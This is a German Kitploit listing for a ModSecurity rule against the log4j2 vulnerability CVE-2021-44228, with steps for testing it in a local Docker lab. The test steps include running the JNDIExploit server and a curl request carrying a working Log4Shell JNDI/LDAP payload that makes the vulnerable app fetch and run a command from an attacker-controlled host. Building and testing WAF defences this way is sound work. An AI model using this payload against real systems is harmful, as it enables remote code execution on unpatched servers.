Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ModSec-log4j2 — ModSec-Regel für den Schutz von log4j2 - CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/felipe8398/modsec-log4j2
SchwachstellenscannerExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsLernen & Bildung
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

ModSec-Regel für den Schutz von log4j2 - CVE-2021-44228

Repository anzeigen
4vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Testen der ModSec-Regel

Voraussetzungen

  • Docker installiert haben
  • Java auf Ihrem Rechner installiert haben

Ausführen des Tests

  • Das Repository klonen
  • Führen Sie den folgenden Befehl aus, um den WAF (ModSec) und die verwundbare Anwendung zu starten
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • Entpacken Sie das JNDIExploit.v1.2.zip, das sich im Repository befindet, wechseln Sie in das Verzeichnis und führen Sie den folgenden Befehl aus, wobei $IP die IP Ihres Rechners sein sollte. Ich empfehle nicht, 127.0.0.1 zu verwenden.
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • Um den RCE zu testen, führen Sie den folgenden curl-Befehl aus, wobei Sie $IP durch die IP Ihres Rechners ersetzen. Er erstellt eine Datei namens pwned im /tmp-Verzeichnis der verwundbaren Anwendung.
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Fragen der Studenten

1- Wie erkenne ich, ob mein WAF und die verwundbare Webanwendung gestartet sind?

Tool herunterladen

Führen Sie docker service ls aus und überprüfen Sie, ob zwei Dienste vorhanden sind, jeder mit einer Replik.

2- Wie erhalte ich das ModSec-Protokoll?

Führen Sie docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log aus.

3- Wie überprüfe ich, ob der RCE nicht funktioniert hat?

Der von uns verwendete curl-Befehl erstellt eine Datei namens pwned in /tmp. Daher müssen wir Folgendes ausführen: docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp